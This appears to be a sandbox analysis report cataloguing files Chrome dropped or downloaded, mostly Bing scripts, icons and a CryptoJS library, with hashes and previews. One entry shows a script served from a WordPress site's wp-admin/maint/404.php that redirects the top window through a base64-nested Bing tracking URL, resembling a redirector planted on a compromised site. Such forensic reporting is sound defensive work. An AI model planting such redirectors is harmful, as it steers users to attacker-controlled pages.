                                                                                                      Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" enable-background="new 0 0 16 16">.. <path d="M0 0h16v16h-16v-16z" fill="none"/>.. <path fill="#007DAA" d="M11 4h4l-5-4v3c0 .552.447 1 1 1zm-3-1v-3h-4.5c-.828 0-1.5.672-1.5 1.5v13c0 .828.672 1.5 1.5 1.5h10c.828 0 1.5-.672 1.5-1.5v-8.5h-4c-1.654 0-3-1.346-3-3zm4.707 10.707c-.181.181-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293s.293.431.293.707-.112.526-.293.707zm0-5.414c.181.181.293.431.293.707s-.112.526-.293.707-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293z"/>..</svg>
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 1030 x 92, 8-bit colormap, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):10060
                                                                                                      Entropy (8bit):7.915600687574725
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:6+6gMSZWBwqxLaGtfbqPDpi1T/yGCbyNIvd2NFjR6OPR/ZviFINR/q:xlqBFtz2Dpi1Tqlby61YjR6oRoF6y
                                                                                                      MD5:3722F42B4F456CEB0A1555A413EB2D83
                                                                                                      SHA1:07A8C61DBCBB857B840BB7A74BCC62352530A97C
                                                                                                      SHA-256:EC8D527D0173AC87E5FED6CF300BC9E8AFCFFB55BA137EBCFC2DF83E1633D8F5
                                                                                                      SHA-512:71631D67BF706042EC6A8DF526B21CCFDB777873746F3015552304812C57666AECEBD1B928B4591EDF87D904D9628F3675E75844F661C2C0C1A629BC9221BAC7
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR.......\.......Gi...gPLTE.........wxzvwy.J.vvw.P.wwy.K.~y... `.wwz....Q.......)J.vvzrvv.......J.......wwzuwv...DDD.T.uwx.......K.................I.CCCvwx9..xzz.K...I..V.7.................O........K..Y....#d.".....vwy.T..l.PWQ!..DDDfff.l.0..DDD.........!\.............E...4..K.....4....DDD....Q....vxzDDD.....b:.....fff"....=?..$e.6...6."i..J?...DDD....5....C...B......$g...3....!\.......#d.C...}..x..n..sm.\..W..........wxz.J..........413......DDD.e".......?.4....qqq$d.......9...m."..7...N.9...T..l.5..1t.3{.&Z.2..6..!\.'o.7.....5..)..U.....K..fffG.....Q..C...R.<...Y..K....?...U..D...X.vw.....f...n..6W..m._R.t..K..#....d?.~H...........tRNS.ML... `..`..`]1..@ .. ..0A.@...pA. ..yp.P../ ...B-.......A....`.G....p.r^.C...pj..`!..p.......?.....pcA.......BN....[..:....$.IDATx...o.E......ZNl#..8...e7..EJC.Q0"...B...B$... Z....+V%....JU.SH9T.J..PP.8.O.......gS..o.wgvv.x.}..Q4.:.:...#U..O....cZ.<=x....2.\8t....|..M..,tp*..-.$.J..|.d..H..j...(.\...M-.G.W...
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (65188)
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):77391
                                                                                                      Entropy (8bit):5.274343929479743
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:986uWt+5MaZ+sefChTFh7g58k0D5ChKt/w976PZM+dfWXNWfGh22m9oCcQhS9Chx:W6uWy/fW8k0kcPySW9mFbiIZ
                                                                                                      MD5:13B147A683AF38608F9C22EE9D66A832
                                                                                                      SHA1:F9291CD3A214674A186F4BE85CDC655A6B3A31FA
                                                                                                      SHA-256:F0B2216568BB538A00EE14C13AD49EA15B1653044A219A698889610EDCF9BF05
                                                                                                      SHA-512:1C4DEB1CF689906DD026C6FE7383CFAC8F1BEABAC05DC65309A35F60CB70EBED45D265351B8B6D35382C5136815E0809772A48E242608E309BECB9B7078CAB17
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/-Skc06IUZ0oYb0voXNxlWms6Mfo.js
                                                                                                      Preview:/**.* -------------------------------------------------------------------------------------------.* Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License..* See License in the project root for license information..* -------------------------------------------------------------------------------------------.*/.var MicrosoftGraph=function(e){"use strict";function t(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}function r(e){return r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},r(e)}function n(e){var t=function(e,t){if("object"!==r(e)||null===e)return e;var n=e[Symbol.toPrimitive];if(void 0!==n){var i=n.call(e,t||"default");if("object"!==r(i))return i;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(e,"st
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (10077), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):10077
                                                                                                      Entropy (8bit):5.3656127544424095
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:2KchVqrW2s8uu5Mc/RiEVCqAbmGevp+1JUpqtCTHcC+FOXFvHYH7lK0f9Tk47jUB:2KchVGW2se5MKiEVwmiup9+UXRHQ7lKl
                                                                                                      MD5:BF0CCA35DCA6862F227A308A1093624F
                                                                                                      SHA1:D16DC418E22DD37A6A0D304AC9B7DB12C9A1DFA4
                                                                                                      SHA-256:43431D5B3D022E0E5B7B7EB1B1745F90E845545B909C9AB8FFB37302EAAC113D
                                                                                                      SHA-512:0226E0DF2FF18C9B6B0057F8621AE9EAA2334677232CF21F00BFE9761DF95E0430B797985347A7F6BCB7BD23B3653B1BF0443D821125DC82250F2E521F8DDDF8
                                                                                                      Malicious:false
                                                                                                      Preview:var bepns=bepns||function(n,t){function ai(){var n=this;sj_be(_w,"message",ki,!1);vi();sj_evt.bind("OpenGoBigFlyout",function(){return a(null)},1);sj_evt.bind("OpenGoBigFlyoutL2",tr,1);f&&sj_be(f,"click",a,!1);sj_evt.bind("AutoOpenFlyout",function(){k=!0;p||!p&&nr()>=1200?l(r,"b_hide")?lt(n.evt,!1):w=fi:w=ei;w&&typeof LightLogger!="undefined"&&LightLogger&&LightLogger.logInstrumentationV2(null,LightLogger.InstrumentationEventType.Init,ui,!0,{SuppressionReason:w})},!0);sj_evt.bind("AutoOpenFlyoutHide",function(){i&&o(null,!0,!1)},!0);sj_evt.bind(rt,bi);sj_evt.bind("onP1",wi,1);sj_evt.bind("id:refreshed",yi,1);window.addEventListener("click",function(){o(null,!1,!0)})}var yt="redDotControl",pt="rh_meter_leaf_homepage",wt="rh_meter_leaf",bt="givemuid_heart_homepage",kt="GiveMuid",dt="GiveSerp",gt="hub_apps_698b01b4-557a-4a3b-9af7-a7e8138e8372",ni="SUCCESS",v="_RwBf",ti="aad",ii="lka",ri="lkt",g="ard",y="rwspotlight",nt="rt-chevr-nf",ui="AutoOpenFlyoutSuppression",fi="BepFlyoutMissingOrNot
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (544), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):544
                                                                                                      Entropy (8bit):4.772516232892929
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:9pX6gew8RhA+a388RhAo6VB288RhAo6V1qxD:XXFe3cN3Tcjr2Tcj+xD
                                                                                                      MD5:2AC240E28F5C156E62CF65486FC9CA2A
                                                                                                      SHA1:1F143A24D7BC4A1A3D9F91F49F2E1BA2B1C3D487
                                                                                                      SHA-256:4325982915D0A661F3F0C30C05EB11A94CB56736D448FDC0313143818741FAA3
                                                                                                      SHA-512:CB90CF76CD9DC16829A3FF12BE5274BD26A94097AD036F199151F1C88534A15BBB8F8DAFDD699E51DF5C38E73C925C00728F807B20C0B097A5842963525BAF4B
                                                                                                      Malicious:false
                                                                                                      Preview:var Orientation;(function(n){function f(n){var f=_w.innerWidth,e;i&&(e=window.matchMedia("(orientation: portrait)"),e.addListener(function(t){_w.innerWidth!=f&&(f=_w.innerWidth,n(!t.matches))}));t&&sj_be(_w,u,function(){_w.innerWidth!=f&&(f=_w.innerWidth,n(_w.innerWidth>_w.innerHeight))});i||t||r||sb_si(function(){_w.innerWidth!=f&&(f=_w.innerWidth,n(_w.innerWidth>_w.innerHeight))},1e3)}var i="matchMedia"in _w,t="onorientationchange"in _w,r="onresize"in _w,u=t?"orientationchange":"resize";n.onOrientation=f})(Orientation||(Orientation={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1937), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1937
                                                                                                      Entropy (8bit):5.461252594947073
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:qYe3k+th+DNfxe2K9vdjmM0QVV9yTRKcDi4:hskXDuf9FmM0AP0LJ
                                                                                                      MD5:BA408C0E6B5F707319A057CF7CE3B4A7
                                                                                                      SHA1:BE42A50E853218E2F83DE38ACC3640C59225CFAF
                                                                                                      SHA-256:E64BDB46CBCAB956F480728DC1DC3AFB17C2C37F20886721246C101F24C3E03F
                                                                                                      SHA-512:6E64BD4A0F7E21C3551183960D88536D0613E617EE186AB52A2E679FA702B08230BBD2CB292A5602D13407DA7280A362FB46FCB15A40F3F77DE55BAE1C41754C
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/vkKlDoUyGOL4PeOKzDZAxZIlz68.js
                                                                                                      Preview:var WV=WV||{};(function(n){function u(){if("webVitals"in _w&&(!("isInit"in n)||!n.isInit)&&typeof sj_evt!="undefined"&&typeof sj_be!="undefined"){var t=_w.webVitals;n.onFCP=i(t.onFCP);n.onLCP=i(t.onLCP);n.onCLS=i(t.onCLS);n.onINP=i(t.onINP);n.metrics={};n.isMetricsFrozen=!1;n.isLogged=!1;sj_evt.bind("onP1",f,!0);sj_evt.bind("ajax.requestSent",h)}}function f(){if(!n.isInit){n.onFCP(e);n.onLCP(t);n.onCLS(t);n.onINP(t);n.isInit=!0}}function e(i){n.isFCPCalledOnce||(n.isFCPCalledOnce=!0,sb_st(function(){sj_be(_d,"visibilitychange",o);sj_be(_w,"pagehide",s)},0),t(i))}function o(){"visibilityState"in _d&&_d.visibilityState==="hidden"&&r()}function s(){r()}function h(){r();l()}function c(){n.isLogged=!1;n.metrics={}}function t(t){var i;switch(t.name){case"FCP":i=parseInt(t.value);break;case"LCP":i=parseInt(t.value);break;case"INP":i=parseInt(t.value);break;case"CLS":i=parseFloat(t.value).toFixed(4)}i&&n.metrics[t.name]!=i&&(n.metrics[t.name]=i,n.isLogged=!1)}function r(){!n.isLogged&&!n.isMet
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1391
                                                                                                      Entropy (8bit):4.796412914000846
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:t4LxSdeBU4dxCey0fA53J/S/7/sG5BmefEqrR5GTGOby2NF2E/:+xSUBU4S55Z/aB5BmefEqrRYK6
                                                                                                      MD5:620580657E8A45B4A7B8450B8DA5CD32
                                                                                                      SHA1:922187F6E9192BA43886FB43B70C15735CAFB9E8
                                                                                                      SHA-256:91DE3100632E986CDB6897793EF1B2A8655B15ED4145098CA489856C043D207E
                                                                                                      SHA-512:F3CE71CD92BA2C6ABD6CDEE48F677522439CAD023042D56728E5CB2DED5EC51D1170308FB1524C4A352AC6C5E4E514147D21B99667CCE54CE35A73D91DD27E4B
                                                                                                      Malicious:false
                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 40 40" width="64" height="64">.. <style type="text/css">.. .anim {.. animation-name: blink;.. animation-duration: 1s;.. animation-iteration-count: infinite;.. fill: #05E9F5;.. transition-timing-function: linear;.. }.. @keyframes blink {.. 0% {.. opacity: 0.. }.. 50% {.. opacity: 1.. }.. 75% {.. opacity: 1.. }.. 100% {.. opacity: 1.. }.. }.. .delay1 {.. animation-delay: 0s;.. }.. .delay2 {.. animation-delay: .125s;.. }.. .delay3 {.. animation-delay: .25s;.. }.. .delay4 {.. animation-delay: .375s;.. }.. .delay5 {.. animation-delay: .5s;.. }.. .delay6 {.. animation-delay: .675s;.. }.. .delay7 {.. animation-delay: .75s;.. }.. .delay8 {.. animation-delay: .875s;.. }.. </style>.. <circle class="delay1 anim" cx="20" cy="8" r="3" />.. <circle class="delay5 anim"
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (2169), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):2169
                                                                                                      Entropy (8bit):5.302641155413102
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:1cLdSF8cWOr7dDv8NQtaPVcbnAhaNaswAUbDdDLpmhMi7WViUCS7SDDRb:1cZSDBdDv8saMPgHfLEM8Xb3Rb
                                                                                                      MD5:61533293909D97252C70E82BD574BA68
                                                                                                      SHA1:7408DD25C19AE7BAF954074576A2F73FBB174310
                                                                                                      SHA-256:99EC639C3DDC51E7882FAB9C08EC5A905B49F4B04D1C47B6DF40F3924E81CD8E
                                                                                                      SHA-512:BF8F8879D1CABD6B8B9C6CAF9FC0A6F68362FC62328112636D78A15A4C08B35EA52E1DD8048715F2BD0E945BB0D2D8D7655E68A065942E89316E303BB536BB41
                                                                                                      Malicious:false
                                                                                                      URL:"https://r.bing.com/rs/6t/kQ/jnc,nj/P2A3uGO2O64dixlm8-ndJ5_iyo4.js?or=w"
                                                                                                      Preview:(function(){function l(n){return parseFloat((_w.getComputedStyle?_w.getComputedStyle(n):n.currentStyle).width)}var a="results_container",t="sb_shr sw_conv",v="sb_shr sw_conva",y={"ans2 ans_n2 ans_msnO":1},i={"sb_h3 cttl":1},r="sb_ltw",p="sb_ans",n=[],u=!!_G.SPSA,f=u?{ansC:1,results:1,sa_bop:1}:{results:1},e=!1,o=20,w=-28,b=function(){if(typeof _d.querySelector!="undefined"){var n=".sb_shr{left:"+w+o+"px;width:0;float:right;margin-left:5px}.sb_ltw{margin:0 0 0 -55px;clear:both;float:left;display:block;width:50px}.pi_tc{float:right;}";sj_ic(n);sj_evt.bind("sp.enter_conv",g,1);sj_evt.bind("sp.leave_conv",h,1);sj_evt.bind("sp.submit_conv",h)}},k=function(){var u,o,i,n,s,r,t,h;if(!e){for(u=_ge(a),o=u?u.childNodes:[],i=0;i<o.length;i++)if(n=o[i],n.id&&f[n.id]||n.className&&f[n.className])for(s=n?n.childNodes:[],r=0;r<s.length;r++)for(t=s[r].firstChild;t;)h=t.nodeType,h!==3&&h!==8&&d(t),t=t.nextSibling;e=!0}},d=function(n){var i=n.className,t;if(i&&i.indexOf(p)>-1){if(u)for(t=n.firstChild.fir
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (8383), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8393
                                                                                                      Entropy (8bit):5.429817497138933
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:R56BosBH7xOudakLR9yyfbnX77ZlhDcJU/s2:R5sNcudxLRLfbnXfZ/cJE
                                                                                                      MD5:DCA436B5A9C5D38DF576E2EF74529EC8
                                                                                                      SHA1:F00D1CAA4C586AAE3A5B280CE4C7B94FA9B6C927
                                                                                                      SHA-256:F360CF7657EB23822810E0936B125E0E35350A9DA69FB32F70EE83642CA02011
                                                                                                      SHA-512:C20AA453F4DCAB6C148EDD594A27D17CC99F8D61A15F1A1FA0C18CB2CDE765BFC26919FC9936B8E3D2600872DDD6BAF441E587B88C413B32B2F3F41F8D843A8E
                                                                                                      Malicious:false
                                                                                                      Preview:var MobileIcon;(function(){function sr(){st()?(it("Overlap"),s("Overlap")):ti("ResizeShow")}function st(){return(et===null||et===void 0?void 0:et.offsetWidth)-((ut===null||ut===void 0?void 0:ut.offsetWidth)+(ft===null||ft===void 0?void 0:ft.offsetWidth)+pt)<li}function o(){h("ClickPage");s("ClickPage")}function gt(t){t.key==="Escape"&&(p||tt)&&(n&&n.focus(),h("EscapeKeydown"),s("EscapeKeydown"))}function hr(){var n;(n=_w.localStorage)===null||n===void 0?void 0:n.setItem(pi,"true")}function ni(n){Log.Log("Click","MobileIconV2","GetApp");Log.Log(r,t,"ClickPanel");n.stopPropagation();_w.open(u,"blank")}function ti(i){n&&bt&&(Lib.CssClass.remove(n,"b_hide"),Log.Log(r,t,hi,!1,"reason",i))}function it(i){n&&Lib.CssClass.add(n,"b_hide");Log.Log(r,t,"HideIcon",!1,"reason",i)}function ht(i){if(!kt){cr(!1);return}if(Log.Log(r,t,"ShowPanel",!1,"reason",i),!dt&&_w.QRCode&&u.length){var f=_qs("#id_mobqrimg");f&&(new _w.QRCode(f,{text:u,width:84,height:84,correctLevel:1}),dt=!0)}fi();dr();n&&Lib.Css
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):102727
                                                                                                      Entropy (8bit):5.3090981493103016
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:j2cqCv9YKcgfYpi2agfBtXykUUFDgXfynmbrf1xusT:j2CV7cgU+g5Udv1Huc
                                                                                                      MD5:D5B84A6628412CF81E7245D5BFCBD3CC
                                                                                                      SHA1:8256EEE1DCCCD4715F2827D9DE3F08C949D205AD
                                                                                                      SHA-256:E1BE65D5511C774311F4370F4A9DC2CCD445F90F2338E64F923D76DDB93C5467
                                                                                                      SHA-512:8E12FEF1199374512E4A3B09BB59C8007115316DDA58F26C7110218D59476B606BEB1E423901A472E41F388CBA0A2D09D2D0EEA1DA37EBDCB5F821F766A3F598
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/glbu4dzM1HFfKCfZ3j8IyUnSBa0.js
                                                                                                      Preview:var AutoSuggest,sa_storage,EventKeyCodes,__extends,Bing,sa_inst;(function(n){var t;(function(n){var t,i,r,u,f,e;(function(n){n.User="SRCHHPGUSR"})(t=n.CookieNames||(n.CookieNames={})),function(n){n.AutoSuggest="AS"}(i=n.CrumbNames||(n.CrumbNames={})),function(n){n.CursorPosition="cp";n.ConversationId="cvid";n.SuggestionCount="sc";n.PartialQuery="pq";n.SuggestionPosition="sp";n.SuggestionType="qs";n.PreviewPaneSuggestionType="qsc";n.SkipValue="sk";n.PreviewPaneSkipValue="skc";n.Ghosting="ghc";n.Css="css";n.Count="count";n.DataSet="ds";n.SessionId="sid";n.TimeStamp="qt";n.Query="q";n.ImpressionGuid="ig";n.QFQuery="qry";n.BaseQuery="bq";n.FormCode="form";n.HashedMuid="nclid";n.RequestElToken="elvr";n.ElTokenValue="elv";n.AppId="appid";n.History="history";n.NoHistory="nohs";n.ApiTextDecoration="textdecorations";n.ClientId="clientid";n.Market="mkt";n.Scope="scope";n.CountryCode="cc";n.HomeGeographicRegion="hgr";n.SetLang="setlang";n.ZeroInputSerp="zis";n.GhShown="ghsh";n.GhAccepted="ghacc";
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:HTML document, ASCII text, with very long lines (402), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):402
                                                                                                      Entropy (8bit):5.7488369636053545
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:63GKGKmmHt73qb8if1xXAQ3d+aVomoc5+lGzUadRtEgUCO6gq3XypyCjIBb:udGKxHtub8iffAiddVomoc5+Mzl1U0Bb
                                                                                                      MD5:0EE61EA0CA099451D23E8CB130938F0E
                                                                                                      SHA1:B0E6025A090F85E7E02247F9961762CA7A6ED0B9
                                                                                                      SHA-256:DB842BD930C816D5E9610891613BD34B7B9A61BE78C85D764FE1F28AA380A887
                                                                                                      SHA-512:7FC307D552BCD76F03698E3F7246D93F0A3325EEA4908B63D4BE4E9798766BC5A32BB36949B66C4DA21DE871E4EE16789582255CF2359FF9A7A8F0D79C2F3AC8
                                                                                                      Malicious:false
                                                                                                      URL:https://clinicaaryal.com/wp-admin/maint/404.php
                                                                                                      Preview:<script>window.top.location.href = "https://r.g.bing.com/bam/ac?!&&u=a1aHR0cHM6Ly9yLmcuYmluZy5jb20vYmFtL2FjPyEmJnU9YTFhSFIwY0hNNkx5OXlMbWN1WW1sdVp5NWpiMjB2WW1GdEwyRmpQeUVtSm5VOVlURmhTRkl3WTBoTk5reDVPV3hpUjJ3d1dsZGFNV015YkhaaWFUVjZXVk0xYW1JeU1IWmFSM1JvV1d0amRtRlhOV3RhV0dkMVlVaFNkR0pEVGtkWFZtUlRZa2RPZEdKSGNHaE5SVXB5VjJ4b1MyTkdhM2xrUjNSaFYwVndNRmRXYUZOa2JVcElUMWMxYkZWNlZuRlpha2wzVUZFOVBRPT0=";</script>
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1961), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1961
                                                                                                      Entropy (8bit):5.161995541916183
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2ap+ya7O4Hy6lt4CZntuJwzjy8PRzncCk+I7qjuyx:2ap+y76y6vHz7pDJoLg
                                                                                                      MD5:6932CD1A76E6959AD4D0F330D6536BB4
                                                                                                      SHA1:E2E7160642FE28BD731A1287CFBDA07A3B5171B7
                                                                                                      SHA-256:041EB2E6F2582F4C19C0820ACF9A0E9A2C7262EDEDE0D397A5F6F0215E83F666
                                                                                                      SHA-512:28BD0BB200704FBAC0DE2D7C3D1C64A38D5567F79BF24B9C9894C7C6A3B80BB69A5C9F0929CF82163C8E8D39CB6667A2AC81DCB4E6D2072CC7FEDFB63219E584
                                                                                                      Malicious:false
                                                                                                      Preview:var AjaxDataLoader;(function(n){function t(n,t,i){if(i===void 0&&(i=null),!n)return null;var r="data-"+t;return i===null?n.getAttribute(r):(n.setAttribute(r,i),i)}function r(n){var t=sj_ce("div",null,"spinner"),i=sj_ce("div",null,"inner");t.appendChild(i);n.insertBefore(t,n.childNodes[0])}function u(n,r,u,f,e,o,h,c,l){e===void 0&&(e=function(){});o===void 0&&(o=function(){});h===void 0&&(h=function(){});c===void 0&&(c=function(){});l===void 0&&(l=function(){});var a=function(t,i){n.innerHTML=f;Log.Log("Error",u,"Ajax",!1,"R",t,"S",i.toString(),"U",r);h(n,t,i);e&&e(n)},v=function(f){l();n.innerHTML=f;try{s(n);_w.rms&&_w.rms.start();t(n,i,""+(new Date).getTime());o(n);e&&e(n)}catch(h){Log.Log("Error",u,"ScriptException",!1,"Tx",h.message,"U",r);c(n);e&&e(n)}};AjaxRequestProcessor.SendRequest(r,null,null,a,v,1e4)}function s(n){var i=n.getElementsByTagName("script"),t,r;if(i)for(t=0;t<i.length;t++)r=i[t],h(r)}function h(n){if(n){var t=sj_ce("script","");t.type="text/javascript";n.src?t.src
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1663), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1663
                                                                                                      Entropy (8bit):5.118614360470706
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2QAKJFFGRc/spJg2WNaQorUcn7RzdAHWd3TRdZhtRkYAe/V5r0nA97StrLntMPU6:wKJFkimqjcrw4D/tD9VWcS1etkEy96vZ
                                                                                                      MD5:D81844C2EBCF5F3260A692E3E89DDE7F
                                                                                                      SHA1:5A3874FB9F597E42FDD94E5BC5DA0A709B70D57A
                                                                                                      SHA-256:9905F086F3F40AC4B8EC2C9F0752A157ED637B2FFC2C87971E8306D6CB12FE9F
                                                                                                      SHA-512:8005F3EBD5BC8DC903917DF581563595EA3E427F31992260AA4E6ED8BC30095442174AD153A83C378575FFB2DE878338B0E87D8CDD57DFDC49E646CA9E4ADA77
                                                                                                      Malicious:false
                                                                                                      Preview:(function(){function v(){n&&(sj_be(_d.body,"click",y),sj_be(n,"click",p),f&&sj_be(f,"click",w),sj_evt.bind("PrimaryNavDropdownMenuShow",i),sj_evt.bind("scs_openflyout",i))}function y(){typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,t)&&i()}function p(r){r.stopPropagation();typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,t)?i():b()}function w(n){n.stopPropagation();var t=s(n.target);t!=null&&Log&&Log.Log&&Log.Log("Click",u,"ScopeDropdownMenuItemClick",!1,"ItemId",t.id);c.trigger(i,null)}function s(n){return n===null?null:typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,e)||Lib.CssClass.contains(n,"b_sp_over_cont")?null:typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,a)?n:n.parentElement?s(n.parentElement):null}function b(){sj_evt.fire("ScopeDropdownMenuShow");typeof Lib.CssClass!="undefined"&&Lib.CssClass.add(n,t);r&&typeof Lib.CssClass!="undefined"&&Lib.CssClass.add(r,o);Log&&Log.Log&&Log.Log("Show",u,"ScopeDropdownMenuShow");n.setAttribute("aria
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):47992
                                                                                                      Entropy (8bit):5.605846858683577
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                      MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                      SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                      SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                      SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                      Malicious:false
                                                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1725), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1725
                                                                                                      Entropy (8bit):5.274895734185393
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:y2x50QNQE0YpOP8A47n0dvZ1fj5O7Rv75gZcODcv/Kum65X9gFiO5yV94GVvwCQO:7Lps4YJOVuK2KG65tggZV5
                                                                                                      MD5:2EF3074238B080B648E9A10429D67405
                                                                                                      SHA1:15D57873FF98195C57E34FC778ACCC41C21172E7
                                                                                                      SHA-256:E90558EB19208AD73F0DE1CD9839D0317594BF23DA0514F51272BF27183F01DA
                                                                                                      SHA-512:C1D7074A0EBF5968B468F98FC4C0C7829999E402DD91C617E679EEB46C873DC04096CBF9277E115FC42C97516A6C11A9F16AFA571E00F0D826BEB463E2D1F7B0
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/FdV4c_-YGVxX40_HeKzMQcIRcuc.js
